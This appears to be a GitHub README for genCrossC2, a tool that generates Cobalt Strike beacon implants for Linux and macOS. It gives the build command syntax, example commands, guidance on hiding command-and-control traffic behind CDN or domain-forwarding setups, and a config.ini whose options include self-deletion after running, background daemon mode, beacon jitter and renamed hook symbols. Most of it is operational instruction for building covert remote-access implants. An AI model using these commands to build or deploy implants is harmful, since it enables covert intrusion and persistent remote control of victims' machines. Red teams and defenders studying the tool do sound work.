-
Notifications
You must be signed in to change notification settings - Fork 344
genCrossC2
-
when the teamserver is configured with c2profile, it can be selected:
-
- automatically parse c2profile (recommend🔥)
-
- generate the rebind library corresponding to c2profile
-
-
when using domain forwarding and other forwarding methods, in addition to (automatically parse c2profile)/(specifying rebind library), you also need to pay attention to the C2_HOST field when generating:
- When the service provider uses the HTTP request content to verify the type, it needs to specify the CDN IP list:
genCrossC2 1.1.1.1,2.2.2.2,3.3.3.3,xxx.xxx.xxx.xx ... - When the CDN server is verified through SNI, CDN operators such as Cloudflare need to specify the domain name bound to the CDN:
genCrossC2 c2.domain.com ...
- When the service provider uses the HTTP request content to verify the type, it needs to specify the CDN IP list:
The build command is:
genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>
<listener-ip/domain>: HOST connected by C2
<listener-port>: PORT connected by C2
<beacon_keys>: Hidden files on teamserver `.cobaltstrike.beacon_keys`
<rebind_library;config.ini;c2profile.profile>: Multiple configuration parameters separated by ; symbols, ignored parameters can be replaced by `null` or ``
<rebind_library>: Dynamic library for custom protocols
<config.ini>: In-depth configuration for controlling beacon behavior, such as function symbol change, startup self-deletion, background mode operation, sleep time, etc.
<c2profile.profile>: For c2profile that needs automatic parsing
<target_platform>: target generation platform MacOS/Linux
<target_arch>: target platform architecture x86/x64
It can be directly imported into c2profile for automatic analysis, without the need to implement the rebind library, etc.
$ genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
When there are multiple available sections in c2profile.profile, you can use the @ symbol to select the part that needs to be parsed
$ genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile@unix-section" Linux x64 beacon.out
You can also write the function of packet sending traffic encapsulation by yourself, and you need to implement the relevant encryption and decryption functions internally
- 📖wiki
- Demo:
- C2Profile demo 📄demo_c2profile.profile 📄demo_c2profil_rebind.c
- UDP communication demo 📄demo_udp_proxy_server.c 📄demo_udp_rebind.c
- Issues: 🏷issue #65 (Example of data transfer and c2profile field correspondence)、🏷issue #89 (Data processing example)
CrossC2/autoRebind can be used to automatically parse Malleable C2 profile and generate the source code of the rebind library
Supports all codec algorithms of CobaltStrike: base64, base64url, mask, netbios, netbiosu
Added config.ini configuration on top of all previous usages
1. genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys null;config.ini MacOS x64 beacon.out
2. genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so;config.ini MacOS x64 beacon.out
3. genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys ;config.ini;c2profile.profile MacOS x64 beacon.out
config.ini:
# Configure the function symbol and global configuration of the beacon itself hook
[c2_config]
# hook function
# initialization stage: void cc2_init() {}
cc2_init = aa1
# Error reconnection stage, incoming reconnection times: void cc2_retryConnect(int retryCount) {}
cc2_retryConnect = bb
# Function name customization for protocol rebinding library
cc2_rebind_get_protocol = cc
cc2_rebind_post_protocol = dd
cc2_rebind_http_get_send = ee3
cc2_rebind_http_get_recv = ff
cc2_rebind_http_post_send = gg
cc2_rebind_http_post_recv = hh
# global configuration
# automatically delete after running
cc2_auto_delete = false
# background process
cc2_daemon = false
# sleep time (10sec)
sleeptime = 10
# heartbeat jitter time
jitter = 37
# data submission jitter time
data_jitter = 100
# create the pipe name of the task(default joblist)
job_pipe_name = joblist
# the name of the pipe to run the task on(default .syspipe)
process_pipe_name = sys_pipe
# requested dns service
dns_server = 8.8.8.8